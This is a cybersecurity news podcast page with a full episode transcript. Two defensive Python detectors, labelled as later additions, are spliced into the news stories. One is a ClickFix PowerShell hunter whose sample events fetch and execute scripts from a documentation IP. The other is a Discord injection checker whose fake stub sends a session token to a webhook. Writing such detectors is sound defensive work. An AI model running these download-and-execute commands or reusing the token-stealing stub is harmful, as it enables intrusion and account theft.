CyberWire Daily - X marks the violation.
Episode Date: January 6, 2026

Grok’s non-consensual imagery draws scrutiny from the European Commission. Researchers link several major data breaches to a single threat actor. The UK unveils a new Cyber Action Plan. A stealthy ClickFix campaign targets the hospitality sector. VVS Stealer malware targets Discord users. Covenant Health and Aflac report data leaks. Google silences a critical Dolby flaw. Ilona Cohen, Chief Legal and Policy Officer at HackerOne, discusses “What the SolarWinds Dismissal Really Means for CISOs: Less Personal Risk, More Scrutiny on Disclosures.” UK students enjoy a digital snow day.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Today we are joined by Ilona Cohen, Chief Legal and Policy Officer at HackerOne and former senior lawyer to President Obama, to discuss “What the SolarWinds Dismissal Really Means for CISOs: Less Personal Risk, More Scrutiny on Disclosures.”

Selected Reading
EU looking ‘very seriously’ at taking action against X over Grok (The Record)
Grok's AI CSAM Shitshow (404 Media)
Dozens of Major Data Breaches Linked to Single Threat Actor (SecurityWeek)
UK Launches New Cyber Unit to Bolster Defences Against Cyber Threats (Infosecurity Magazine)
Sophisticated ClickFix Campaign Targeting Hospitality Sector (SecurityWeek)
New VVS Stealer Malware Targets Discord Users via Fake System Errors (Hackread)
Covenant Health Notifying 480K Patients of 2025 Data Theft (Infosecurity)
Aflac Notifies 22.6 Million People of June Data Theft Attack (Infosecurity)
Critical Dolby leak in Android patched by Google (Techzine Global)
Students bag extended Christmas break after cyber hit on school IT (The Register)

Share your feedback. What do you think about CyberWire Daily?
Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? N2K CyberWire helps you reach the industry’s most influential leaders and operators, while building visibility, authority, and connectivity across the cybersecurity community. Learn more at sponsor.thecyberwire.com. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
You're listening to the Cyberwire Network, powered by N2K.
Ever wished you could rebuild your network from scratch to make it more secure, scalable, and simple?
Meet Meter, the company reimagining enterprise networking from the ground up.
Meter builds full-stack, zero-trust networks, including hardware, firmware, and software,
all designed to work seamlessly together.
The result, fast, reliable, and secure connectivity
without the constant patching, vendor juggling, or hidden costs.
From wired and wireless to routing, switching, firewalls, DNS security, and VPN,
every layer is integrated and continuously protected in one unified platform.
And since it's delivered as one predictable monthly service,
you skip the heavy capital costs and endless upgrade cycles.
Meter even buys back your old infrastructure to make switching effortless.
Transform complexity into simplicity and give your team time to focus on what really matters,
helping your business and customers thrive.
Learn more and book your demo at meter.com slash cyberwire.
That's M-E-T-E-R dot com slash cyberwire.
Grok's non-consensual imagery draws scrutiny from the European Commission.
Researchers link several major data breaches to a single threat actor.
The UK unveils a new cyber action plan.
A stealthy ClickFix campaign targets the hospitality sector.
VVS Stealer malware targets Discord users.
Covenant Health and Aflac report data leaks.
Google silences a critical Dolby flaw.
Ilona Cohen, chief legal and policy officer at HackerOne, joins us to discuss what the SolarWinds dismissal really means for CISOs.
And UK students enjoy a digital snow day.
It's Tuesday, January 6, 2026.
I'm Dave Bittner, and this is your Cyberwire Intel briefing.
Thanks for joining us here today.
It's great as always to have you with us.
The European Commission is considering enforcement action against X (formerly Twitter) after its artificial
intelligence tool, Grok, was used to generate sexualized images of a minor. The issue surfaced
after Grok responded to prompts to digitally remove clothing from images, including one involving
a 14-year-old actress, amid wider misuse to create non-consensual sexual imagery of women.
Commission spokesperson Thomas Regnier said officials are very seriously examining the matter,
calling the outputs illegal and unacceptable in Europe.
He noted this was not the first problematic incident involving Grok and referenced prior concerns,
including the spread of Holocaust denying material.
The scrutiny follows a 120 million euro fine issued to X under the Digital Services Act,
which X criticized as political censorship.
The controversy has intensified tensions
between the EU and the United States
over platform regulation.
Meanwhile, investigations are also underway in France,
and the UK regulator Ofcom has warned
that creating non-consensual intimate images
is a criminal offense
and is assessing X's compliance with UK law.
Security firm Hudson Rock
reports that several major data breaches are linked to a threat actor known as Zestix,
also associated with the persona Centap.
The actor functions as an initial access broker,
using stolen credentials harvested by information-stealing malware to break into enterprise networks,
exfiltrate data, and sell both data and system access on underground forums.
Hudson Rock says the credentials were collected from infected employee devices,
sometimes sitting in logs for years before being exploited.
Weak protections, particularly the absence of multi-factor authentication on file-sharing services,
enabled repeated compromises.
Victims span aerospace, government, health care, legal, and robotics sectors,
with stolen data sets reportedly sold for up to $150,000.
The findings highlight the long-running infostealer problem,
where malware-as-a-service has commoditized cybercrime
and made large-scale credential theft easier, faster, and harder to detect.
The U.K. government has unveiled a new cyber action plan
that includes a centralized cyber unit
and a software security ambassador scheme
to strengthen public sector cyber resilience.
The measures follow several high-profile 2025 cyber incidents
affecting organizations such as Jaguar Land Rover, Marks & Spencer, and the Co-op, as well as a
recent attack on a supplier to the National Health Service. Backed by 210 million pounds in funding,
the plan aims to raise baseline security standards and improve coordinated incident response.
The new government cyber unit housed within the Department for Science, Innovation, and Technology
will oversee cross-department risk management.
The Ambassador Scheme promotes a voluntary software security code of practice
to reduce supply chain risk.
While widely welcomed, some experts warn the funding may fall short of the challenge's scale.
Security firm Securonix warns of a stealthy ClickFix phishing campaign
targeting the hospitality sector to deliver remote access Trojans.
The attack uses fake Booking.com cancellation emails
that lure victims to impersonation sites with deceptive CAPTCHAs and fake blue-screen messages.
Victims are tricked into running PowerShell commands that deploy a customized DCRat.
The malware disables defenses, establishes persistence,
and uses resilient command and control techniques designed to survive infrastructure takedowns.
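One way a defender can hunt for the pattern described above in endpoint telemetry, as an added example that is not code from the original page or from Securonix: the script below scores process-creation records for the hallmarks of a pasted ClickFix command (a script host spawned directly from explorer.exe, as the Win+R Run box does, with a download cradle, in-memory execution, a hidden window or an encoded command) and decodes -EncodedCommand payloads before matching them. The tab-separated record layout, the indicator list, the 203.0.113.0/24 addresses and the sample events are all constructed for this example.

```python
import base64
import re
from pathlib import PureWindowsPath

# Script hosts that ClickFix lures tell the victim to launch from the Win+R Run box.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# The Run dialog spawns its child straight from explorer.exe; admin scripts,
# schedulers and RMM agents normally arrive with a different parent.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Indicator regexes are an assumption for this example, not a vendor signature set.
INDICATORS = {
    "download-cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|start-bitstransfer|curl|wget)\b", re.I),
    "in-memory-exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy-bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "remote-url": re.compile(r"https?://", re.I),
}
# -e, -ec, -enc and -EncodedCommand all take a base64 blob of UTF-16LE script.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -EncodedCommand, or "" if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return ""
    return raw.decode("utf-16le", errors="ignore")


def analyze_event(line: str) -> dict:
    """Parse one tab-separated key=value process-creation record and score it."""
    fields = dict(kv.split("=", 1) for kv in line.rstrip("\n").split("\t") if "=" in kv)
    image = PureWindowsPath(fields.get("Image", "")).name.lower()
    parent = PureWindowsPath(fields.get("ParentImage", "")).name.lower()
    cmdline = fields.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Scan the visible command line and the decoded payload together.
    haystack = cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded:
        hits.append("encoded-command")
    if image == "mshta.exe" and "remote-url" in hits:
        hits.append("mshta-remote")
    flagged = parent in RUN_DIALOG_PARENTS and image in SCRIPT_HOSTS and len(hits) >= 2
    return {"parent": parent, "image": image, "indicators": hits,
            "decoded": decoded, "flagged": flagged}


def detect_clickfix(lines) -> list:
    """Return the analysis of every record that looks like a pasted ClickFix command."""
    return [r for r in map(analyze_event, lines) if r["flagged"]]


def _event(parent: str, image: str, cmdline: str) -> str:
    return f"ParentImage={parent}\tImage={image}\tCommandLine={cmdline}"


_EXPLORER = r"C:\Windows\explorer.exe"
_CMD = r"C:\Windows\System32\cmd.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_MSHTA = r"C:\Windows\System32\mshta.exe"
_ENC = base64.b64encode(
    "Invoke-WebRequest http://203.0.113.10/x.ps1 | Invoke-Expression".encode("utf-16le")).decode()

# Constructed sample telemetry for the example; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    _event(_EXPLORER, _PS, 'powershell -w hidden -c "iwr http://203.0.113.10/c.txt | iex"'),
    _event(_EXPLORER, _PS, f"powershell -nop -w hidden -enc {_ENC}"),
    _event(_EXPLORER, _MSHTA, "mshta http://203.0.113.10/verify.hta"),
    _event(_CMD, _PS, r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    _event(_EXPLORER, _PS, "powershell"),
]

if __name__ == "__main__":
    for r in detect_clickfix(SAMPLE_EVENTS):
        print(f"{r['parent']} -> {r['image']}: {', '.join(r['indicators'])}")
```

Run as a file it prints the three flagged records and leaves the admin backup script and the bare console launch alone. Sysmon Event ID 1 or Windows 4688 events can be fed in after rearranging their fields into the same tab-separated layout; the Run dialog's own history in the RunMRU registry key is a second place worth checking for the same command text.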
Researchers at Palo Alto Networks' Unit 42 have disclosed details of VVS
Stealer, a Python-based malware targeting Discord users. Active since at least April 2025,
the malware is distributed as a PyInstaller package, allowing it to run easily on Windows systems.
Its primary goal is to steal Discord authentication tokens, giving attackers access to private
messages, accounts, and potentially billing data. VVS Stealer uses fake error messages to trick users into
rebooting, then performs a Discord injection that modifies application files to monitor activity
in real time. It also harvests credentials from major browsers, captures screenshots, and
exfiltrates data via webhooks. Unit 42 reports the malware is sold as a subscription service
on Telegram, highlighting the continued commercialization of credential-stealing malware.
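Discord injection of the kind described above generally works by patching the client's desktop-core loader (discord_desktop_core/index.js) so the stealer's code runs inside the app and can watch token traffic, then posts what it finds to a webhook. The checker below is an added example, not code from the original page or from Unit 42: it classifies the contents of that loader as clean, modified or suspicious and extracts any webhook URLs. The stock one-line loader, the module path layout under a Discord install and the three sample files are assumptions constructed for this example; verify the stock contents against a known-good install before relying on the comparison, and note that legitimate client mods also rewrite this file, which is why a bare modification is only flagged for review.

```python
import re
from pathlib import Path

# Stock discord_desktop_core/index.js is a one-line loader for core.asar.
# The exact string is an assumption: verify it against a known-good install.
STOCK_INDEX_JS = "module.exports = require('./core.asar');"

# Discord webhook URLs: a numeric id followed by a long opaque token.
WEBHOOK_RX = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d{17,20}/[A-Za-z0-9_-]{60,}")

# Things a token grabber needs that a stock loader never mentions (assumed markers).
INJECTION_MARKERS = {
    "token-access": re.compile(r"\btoken\b", re.I),
    "storage-read": re.compile(r"localStorage|leveldb|Local Storage", re.I),
    "network-hook": re.compile(r"XMLHttpRequest|webContents|\bfetch\(", re.I),
    "outbound-http": re.compile(r"require\(['\"]https?['\"]\)"),
    "self-persist": re.compile(r"index\.js|writeFile", re.I),
}


def _normalise(text: str) -> str:
    return "\n".join(line.strip() for line in text.splitlines() if line.strip())


def inspect_discord_core(index_js: str) -> dict:
    """Classify one index.js body as clean, modified (review it) or suspicious."""
    modified = _normalise(index_js) != STOCK_INDEX_JS
    webhooks = WEBHOOK_RX.findall(index_js)
    indicators = [name for name, rx in INJECTION_MARKERS.items() if rx.search(index_js)]
    if webhooks:
        indicators.append("webhook-exfil")
    if not modified:
        verdict = "clean"
    elif webhooks or len(indicators) >= 2:
        verdict = "suspicious"
    else:
        verdict = "modified"  # client mods also patch this file; inspect by hand
    return {"modified": modified, "webhooks": webhooks,
            "indicators": indicators, "verdict": verdict}


def scan_install(discord_root: Path) -> list:
    """Inspect every desktop-core loader under a Discord install directory
    (e.g. %LOCALAPPDATA%\\Discord). The module path layout is an assumption."""
    results = []
    pattern = "app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js"
    for path in discord_root.glob(pattern):
        result = inspect_discord_core(path.read_text(encoding="utf-8", errors="replace"))
        result["path"] = str(path)
        results.append(result)
    return results


# Constructed sample files for the example, not real artefacts.
CLEAN_INDEX_JS = STOCK_INDEX_JS + "\n"
CLIENT_MOD_INDEX_JS = "require('C:\\\\mods\\\\client-mod.asar');\n" + STOCK_INDEX_JS + "\n"
_FAKE_WEBHOOK = "https://discord.com/api/webhooks/123456789012345678/" + "a1B2c3" * 12
INJECTED_INDEX_JS = STOCK_INDEX_JS + "\n" + "\n".join([
    "// constructed stand-in for an injected stub, not real malware",
    "const https = require('https');",
    f"const WEBHOOK = '{_FAKE_WEBHOOK}';",
    "const origOpen = XMLHttpRequest.prototype.open;",
    "XMLHttpRequest.prototype.open = function (method, url) {",
    "  if (url.includes('/users/@me')) send(WEBHOOK, { token: localStorage.token });",
    "  return origOpen.apply(this, arguments);",
    "};",
]) + "\n"

if __name__ == "__main__":
    for name, body in [("stock", CLEAN_INDEX_JS), ("client-mod", CLIENT_MOD_INDEX_JS),
                       ("injected", INJECTED_INDEX_JS)]:
        r = inspect_discord_core(body)
        print(f"{name}: {r['verdict']} {r['indicators']} {r['webhooks']}")
```

A "suspicious" verdict is a reason to kill the client, rotate the Discord token (changing the password invalidates it) and treat the machine as compromised, since the same family also pulls browser credentials. The webhook URL it extracts is the attacker's exfiltration channel and can be reported to Discord for takedown.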
Nearly 478,000 patients of Covenant Health are being notified that their data may have been stolen in a May 2025 cyber attack.
The incident, claimed by the Qilin ransomware group, initially appeared limited but was later found to have a far wider impact.
Potentially exposed data includes personal insurance and medical information.
Covenant says it shut down systems to contain the attack and has since
strengthened security, though details remain limited.
Aflac is notifying 22.6 million people that their personal and health information may have
been stolen in a June 2025 cyber attack. The insurer says the incident was quickly contained
and did not involve ransomware, but compromised data may include Social Security numbers and
health details. The breach could become the largest U.S. health data incident reported in 2025.
AFLAC is offering credit monitoring, while multiple class action lawsuits have been filed amid speculation,
unconfirmed by the company, that Scattered Spider was involved.
Google has patched a critical vulnerability affecting the Android implementation of Dolby software.
The flaw is a buffer overflow in multiple Dolby UDC versions.
According to Wiz, the issue stems from improper buffer allocation when processing evolution data,
leading to out-of-bounds writes and
potential data leakage. Dolby rated the bug as moderate severity, noting it typically causes
media player crashes. Google, however, classifies it as critical, warning that combined
with other Android flaws, it could have greater impact, particularly on Pixel devices. The
vulnerability has now been fixed through Android security updates.
Coming up after the break, my conversation with Ilona Cohen,
chief legal and policy officer at HackerOne,
and UK students enjoy a digital snow day.
What's your 2 a.m. security worry? Is it "Do I have the right controls in place?" Maybe "Are my vendors secure?"
Or the one that really keeps you up at night: "How do I get out from under these old tools and manual processes?"
That's where Vanta comes in. Vanta automates the manual work so you can stop sweating over spreadsheets,
chasing audit evidence, and filling out endless questionnaires. Their trust
management platform continuously monitors your systems, centralizes your data, and simplifies your
security at scale. And it fits right into your workflows, using AI to streamline evidence
collection, flag risks, and keep your program audit-ready all the time. With Vanta, you get everything
you need to move faster, scale confidently, and finally get back to sleep. Get started at Vanta.com
slash cyber. That's V-A-N-T-A dot com slash cyber.
Most environments trust far more than they should, and attackers know it.
ThreatLocker solves that by enforcing default deny at the point of execution.
With ThreatLocker Allowlisting, you stop unknown executables cold.
With Ringfencing, you control how trusted applications behave, and with ThreatLocker
DAC, Defense Against Configurations, you get real assurance that your environment is free of
misconfigurations and clear visibility into whether you meet compliance standards.
ThreatLocker is the simplest way to enforce zero-trust principles without the operational pain.
It's powerful protection that gives CISOs real visibility, real control, and real peace of mind.
ThreatLocker makes zero trust attainable, even for small security teams.
See why thousands of organizations choose ThreatLocker to minimize alert fatigue, stop ransomware at the source, and regain control over their
environments. Schedule your demo at ThreatLocker.com slash N2K today.
Ilona Cohen is Chief Legal and Policy Officer at HackerOne. She joins me to discuss what the
SolarWinds dismissal really means for CISOs.
The company had a fairly sizable breach.
The Securities and Exchange Commission, in 2023,
brought a claim against the company and its CISO for the way they handled the response
to that breach and the disclosures that they made prior to it.
That brought shockwaves to the community because it was the first time that a CISO was charged
for activities relating to the company as a whole.
Well, let's talk about that a bit,
because I remember this happening,
and as you say, lots of conversation,
particularly among CISOs.
What were the fears here,
the peril that this could put them in?
Well, the SEC charged the CISO
over alleged misrepresentations about cybersecurity,
and the SEC had a very broad reading of its authority. And honestly, they've had a very broad
reading of that authority for a long time. But here, the claim was because it has control
and oversight over a company's internal accounting controls, the SEC's reading was extremely
broad because, you know, you can imagine that the SEC Act that they're relying on doesn't say
anything about cybersecurity at all. And so for them to reach a conclusion that not only they could
police what the company said to its investors, but how they managed their cybersecurity program
in great detail was, you know, not something that came naturally by a reading of the statute.
I see. So take us through what has changed over time to get us where we are today and the SEC changing their direction.
Well, I wouldn't call it a complete retreat, but it is a definite recalibration for the SEC.
In 2024, the first time a court had an opportunity to review this case, they threw out about all of the charges except for a handful,
less than a handful.
And that's because they rejected that broad theory
that internal accounting rules could be stretched
to cover all aspects of a cybersecurity program design.
So in light of that rejection,
the SEC had to really consider,
well, do we want to worry or risk further narrowing our authority
in this new environment,
or will we either settle this case,
which is something that they signaled for a very long time
or just dismiss it altogether
in order to be able to preserve the authority
that they believe that they have.
And that is the choice that they ultimately took.
They decided to dismiss this case
and not risk the chance
that a subsequent court would restrict their authority even further.
I see.
So to what degree, if any,
is this a result of shifting administration
so that the Trump administration, for example,
would have a different attitude than the Biden administration, if at all?
It's a great question, and it's something that many folks have been debating.
But instead of the administration shift,
I actually think it is primarily the result of a Supreme Court precedent
and a major shift in the way that the Supreme Court has addressed
agency interpretation of their own legal statutes that govern them. So at the end of the
2024 term, right around the time that the district court was deciding this case, and before
the SEC decided to dismiss the whole thing altogether, the Supreme Court issued a ruling
in Loper Bright, which overturned about 40 years of precedent established by the Chevron case.
And that required judges to defer to a federal agency's interpretation of an ambiguous law.
And, you know, again, providing that that interpretation was reasonable.
So in that example, if Chevron deference were still in place, then, you know, the court would have had to defer to the SEC to interpret their statute and to take enforcement actions that were related to that statute.
But now, in this new universe where courts have no reason or no need to defer to agencies on how they interpret their law, then I think the court would have looked at this anew and had a lot of good questions about why the SEC was interpreting this law that has nothing to do with cybersecurity in a way that essentially micromanages a company's cybersecurity
program. Yeah, that's interesting. So is it a case of it not necessarily being the shift
in the presidential administration, but the shift of the makeup and preferences of this Supreme Court?
I wouldn't say that the shift in administration had nothing to do with it, because there are different
enforcement priorities any time you shift administrations. And so you certainly could see that here
and it would be reasonable to say that that plays some part of it.
But in my view, the real reason not to pursue this case is because it could potentially weaken the authority that the SEC has been relying on for some time.
I see.
So given everything that's happened, if I'm a CISO, what should I be thinking these days?
Well, that's a great question.
they're all breathing a sigh of relief.
There's no question about that.
If I were a CISO, I would take a very deep breath and feel comforted by the fact that there's
much less likelihood that I will be charged by the SEC personally.
However, that doesn't mean they have a completely blank check.
And I don't think any CISO I know certainly is thinking that they can just
do anything, get away with anything, that's certainly not the type that takes that job.
So they're still worried about making sure that if they're worried about SEC enforcement,
they should be worried about whether or not they are saying the right thing to investors.
Am I suggesting that I have a very robust program?
And, you know, even though there's documentation to suggest otherwise, am I doing anything, or is the company doing anything that directly contradicts what is in the record with respect to the cybersecurity program?
Because really, the SEC's authority, the heart of the SEC's authority is about making sure that you're not misleading investors.
And so the CISO finds him or herself at a very
important point where they're working with legal and they're working with the board and they're
working with, you know, the company's leadership to make sure that what you say to the public
is actually accurate and it reflects the, you know, the reality of the program. So that's
something that there will, that will, I don't think that's an authority that will ever be taken away
from the SEC. That's Ilona Cohen from HackerOne.
And finally, in a modern twist on the traditional snow day,
students at Higham Lane School in Warwickshire earned an unscheduled extension to their Christmas break,
not thanks to icy roads, but a cyber attack that wiped out the school's IT systems.
Phones, email, servers, and management platforms all went dark,
prompting leaders to close the school and call in a cyber incident response team from the Department for Education.
Head teacher Michael Gannon told parents the shutdown was advised by external experts
and that staff and students should avoid all school systems while investigations continue.
With Google Classroom and SharePoint off-limits,
pupils were redirected to BBC Bitesize and Oak National Academy,
proving revision can happen even when the network cannot.
The school has reported the incident to the Information Commissioner's Office,
acknowledging possible data protection implications.
A reopening is planned, but only once systems are safe,
turning this digital outage into a lesson in how fragile school IT can be.
And that's the Cyberwire.
For links to all of today's stories,
check out our daily briefing at the Cyberwire.com.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights
that keep you a step ahead in the rapidly changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app.
Please also fill out the survey in the show notes or send an email to Cyberwire at N2K.com.
N2K's senior producer is Alice Carruth.
Our Cyberwire producer is Liz Stokes.
We're mixed by Trey Hester with original music by Elliot Peltzman.
Our executive producer is Jennifer Eiben.
Peter Kilpe is our publisher, and I'm Dave Bittner.
Thanks for listening. We'll see you back here tomorrow.
